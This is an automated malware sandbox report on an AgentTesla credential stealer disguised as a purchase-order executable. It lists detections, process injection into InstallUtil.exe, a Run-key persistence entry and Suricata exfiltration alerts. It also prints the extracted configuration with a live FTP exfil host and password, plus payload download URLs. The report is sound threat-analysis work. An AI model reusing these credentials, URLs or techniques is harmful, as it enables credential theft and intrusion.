Edit tour

Windows Analysis Report
PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Overview

General Information

Sample name:	PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe
Analysis ID:	1525500
MD5:	96a7ec39104585a6dedc95933dd9ac66
SHA1:	3dcbb5b705081ea3a822bcc29d0bcc85626d45ed
SHA256:	44562817ca024e665e0c44fa1911e74d210f938a29518ce0b186a11bbff1ff72
Tags:	exeuser-lowmal3
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

.NET source code contains potential unpacker

AI detected suspicious sample

Allocates memory in foreign processes

Connects to many ports of the same IP (likely port scanning)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses FTP

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe" MD5: 96A7EC39104585A6DEDC95933DD9AC66)

InstallUtil.exe (PID: 7792 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

Iujcy.exe (PID: 8044 cmdline: "C:\Users\user\AppData\Roaming\Iujcy.exe" MD5: 96A7EC39104585A6DEDC95933DD9AC66)

InstallUtil.exe (PID: 8116 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

Iujcy.exe (PID: 5428 cmdline: "C:\Users\user\AppData\Roaming\Iujcy.exe" MD5: 96A7EC39104585A6DEDC95933DD9AC66)

InstallUtil.exe (PID: 7216 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.1406060277.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1406060277.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.1409827566.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000B.00000002.1516278275.000000000315E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.1544555962.00000000038FB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.1544555962.00000000038FB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.2503048867.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1290774383.00000000029BA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1290774383.00000000029BA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.1516278275.000000000311C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.1516278275.000000000311C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.1441897050.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1441897050.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.1413730064.0000000002CCE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.1413730064.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1413730064.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.1441897050.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1441897050.0000000003EE4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000A.00000002.1409827566.0000000003196000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.1409827566.0000000003196000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000E.00000002.2503048867.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.1544555962.00000000039AB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.1544555962.00000000039AB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1315698020.0000000005920000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1290774383.00000000025E7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000D.00000002.1515623045.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.1515623045.0000000002D85000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.1515623045.00000000027F7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1311519040.00000000035A8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1311519040.00000000035A8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe PID: 7288	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe PID: 7288	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe PID: 7288	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe PID: 7288	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: InstallUtil.exe PID: 7792	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 7792	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Iujcy.exe PID: 8044	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Iujcy.exe PID: 8044	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Iujcy.exe PID: 8044	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Iujcy.exe PID: 8044	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: InstallUtil.exe PID: 8116	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 8116	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Iujcy.exe PID: 5428	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Iujcy.exe PID: 5428	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Iujcy.exe PID: 5428	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Iujcy.exe PID: 5428	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: InstallUtil.exe PID: 7216	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 7216	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 43 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.2.Iujcy.exe.3910328.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.Iujcy.exe.3910328.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
13.2.Iujcy.exe.3910328.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31261:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x312d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3135d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x313ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31459:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x314cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x31561:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x315f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
13.2.Iujcy.exe.3910328.3.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2e67c:$s2: GetPrivateProfileString 0x2dd9d:$s3: get_OSFullName 0x2f38e:$s5: remove_Key 0x2f56c:$s5: remove_Key 0x3047a:$s6: FtpWebRequest 0x31243:$s7: logins 0x317b5:$s7: logins 0x344ba:$s7: logins 0x34578:$s7: logins 0x35e7e:$s7: logins 0x3511c:$s9: 1.85 (Hash, version 2, native byte-order)
10.2.Iujcy.exe.3ee4480.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.Iujcy.exe.3ee4480.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.Iujcy.exe.3ee4480.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33061:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x330d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3315d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x331ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33259:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x332cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33361:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x333f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.Iujcy.exe.3ee4480.4.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x3047c:$s2: GetPrivateProfileString 0x2fb9d:$s3: get_OSFullName 0x3118e:$s5: remove_Key 0x3136c:$s5: remove_Key 0x3227a:$s6: FtpWebRequest 0x33043:$s7: logins 0x335b5:$s7: logins 0x362ba:$s7: logins 0x36378:$s7: logins 0x37c7e:$s7: logins 0x36f1c:$s9: 1.85 (Hash, version 2, native byte-order)
13.2.Iujcy.exe.3910328.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.Iujcy.exe.3910328.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
13.2.Iujcy.exe.3910328.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33061:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x330d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3315d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x331ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33259:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x332cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33361:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x333f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
13.2.Iujcy.exe.3910328.3.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x3047c:$s2: GetPrivateProfileString 0x2fb9d:$s3: get_OSFullName 0x3118e:$s5: remove_Key 0x3136c:$s5: remove_Key 0x3227a:$s6: FtpWebRequest 0x33043:$s7: logins 0x335b5:$s7: logins 0x362ba:$s7: logins 0x36378:$s7: logins 0x37c7e:$s7: logins 0x36f1c:$s9: 1.85 (Hash, version 2, native byte-order)
10.2.Iujcy.exe.3ee4480.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.Iujcy.exe.3ee4480.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
10.2.Iujcy.exe.3ee4480.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31261:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x312d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3135d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x313ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31459:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x314cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x31561:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x315f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.Iujcy.exe.3ee4480.4.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2e67c:$s2: GetPrivateProfileString 0x2dd9d:$s3: get_OSFullName 0x2f38e:$s5: remove_Key 0x2f56c:$s5: remove_Key 0x3047a:$s6: FtpWebRequest 0x31243:$s7: logins 0x317b5:$s7: logins 0x344ba:$s7: logins 0x34578:$s7: logins 0x35e7e:$s7: logins 0x3511c:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.5920000.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
8.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
8.2.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33061:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x330d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3315d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x331ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33259:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x332cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33361:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x333f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.InstallUtil.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x3047c:$s2: GetPrivateProfileString 0x2fb9d:$s3: get_OSFullName 0x3118e:$s5: remove_Key 0x3136c:$s5: remove_Key 0x3227a:$s6: FtpWebRequest 0x33043:$s7: logins 0x335b5:$s7: logins 0x362ba:$s7: logins 0x36378:$s7: logins 0x37c7e:$s7: logins 0x36f1c:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x24e2c1:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x24e333:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x24e3bd:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x24e44f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x24e4b9:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x24e52b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x24e5c1:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x24e651:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.3665c40.1.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x24b6dc:$s2: GetPrivateProfileString 0x24adfd:$s3: get_OSFullName 0x24c3ee:$s5: remove_Key 0x24c5cc:$s5: remove_Key 0x24d4da:$s6: FtpWebRequest 0x24e2a3:$s7: logins 0x24e815:$s7: logins 0x25151a:$s7: logins 0x2515d8:$s7: logins 0x252ede:$s7: logins 0x25217c:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.36b5c60.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.36b5c60.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.36b5c60.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.36b5c60.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x1fe2a1:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x1fe313:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x1fe39d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x1fe42f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x1fe499:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x1fe50b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x1fe5a1:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x1fe631:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.36b5c60.3.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x1fb6bc:$s2: GetPrivateProfileString 0x1faddd:$s3: get_OSFullName 0x1fc3ce:$s5: remove_Key 0x1fc5ac:$s5: remove_Key 0x1fd4ba:$s6: FtpWebRequest 0x1fe283:$s7: logins 0x1fe7f5:$s7: logins 0x2014fa:$s7: logins 0x2015b8:$s7: logins 0x202ebe:$s7: logins 0x20215c:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.35a9550.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.35a9550.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.35a9550.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x999c9:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x30a9b1:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x99a3b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x30aa23:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x99ac5:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x30aaad:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x99b57:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x30ab3f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x99bc1:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x30aba9:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x99c33:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x30ac1b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x99cc9:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x30acb1:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x99d59:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x30ad41:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe.35a9550.2.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x96de4:$s2: GetPrivateProfileString 0x307dcc:$s2: GetPrivateProfileString 0x96505:$s3: get_OSFullName 0x3074ed:$s3: get_OSFullName 0x97af6:$s5: remove_Key 0x97cd4:$s5: remove_Key 0x308ade:$s5: remove_Key 0x308cbc:$s5: remove_Key 0x98be2:$s6: FtpWebRequest 0x309bca:$s6: FtpWebRequest 0x999ab:$s7: logins 0x99f1d:$s7: logins 0x9cc22:$s7: logins 0x9cce0:$s7: logins 0x9e5e6:$s7: logins 0x30a993:$s7: logins 0x30af05:$s7: logins 0x30dc0a:$s7: logins 0x30dcc8:$s7: logins 0x30f5ce:$s7: logins 0x9d884:$s9: 1.85 (Hash, version 2, native byte-order)
Click to see the 30 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Iujcy.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe, ProcessId: 7288, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Iujcy

Suricata Signatures

ET MALWARE AgentTesla Exfil via FTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-04T10:41:12.348579+0200	2029927	1	A Network Trojan was detected	192.168.2.7	49700	5.2.84.236	21	TCP
2024-10-04T10:41:23.412077+0200	2029927	1	A Network Trojan was detected	192.168.2.7	49740	5.2.84.236	21	TCP
2024-10-04T10:41:33.169028+0200	2029927	1	A Network Trojan was detected	192.168.2.7	49796	5.2.84.236	21	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-04T10:41:12.961239+0200	2855542	1	A Network Trojan was detected	192.168.2.7	49701	5.2.84.236	52560	TCP
2024-10-04T10:41:12.967063+0200	2855542	1	A Network Trojan was detected	192.168.2.7	49701	5.2.84.236	52560	TCP
2024-10-04T10:41:24.038304+0200	2855542	1	A Network Trojan was detected	192.168.2.7	49760	5.2.84.236	53494	TCP
2024-10-04T10:41:24.043810+0200	2855542	1	A Network Trojan was detected	192.168.2.7	49760	5.2.84.236	53494	TCP
2024-10-04T10:41:33.785792+0200	2855542	1	A Network Trojan was detected	192.168.2.7	49812	5.2.84.236	51014	TCP
2024-10-04T10:41:34.084545+0200	2855542	1	A Network Trojan was detected	192.168.2.7	49812	5.2.84.236	51014	TCP
2024-10-04T10:41:34.693935+0200	2855542	1	A Network Trojan was detected	192.168.2.7	49812	5.2.84.236	51014	TCP
2024-10-04T10:41:34.829417+0200	2855542	1	A Network Trojan was detected	192.168.2.7	49812	5.2.84.236	51014	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Iujcy.exe

Avira: detection malicious, Label: HEUR/AGEN.1310836

Found malware configuration

Source: 8.2.InstallUtil.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}

Multi AV Scanner detection for domain / URL

Source: wymascensores.com	Virustotal: Detection: 11%	Perma Link
Source: https://wymascensores.com/ozeli/Xibknlpkg.vdf	Virustotal: Detection: 10%	Perma Link
Source: https://wymascensores.com/ozeli/Xibknlpkg.vdf18p6Mu3xADDSL	Virustotal: Detection: 10%	Perma Link
Source: https://wymascensores.com	Virustotal: Detection: 6%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Iujcy.exe	ReversingLabs: Detection: 31%
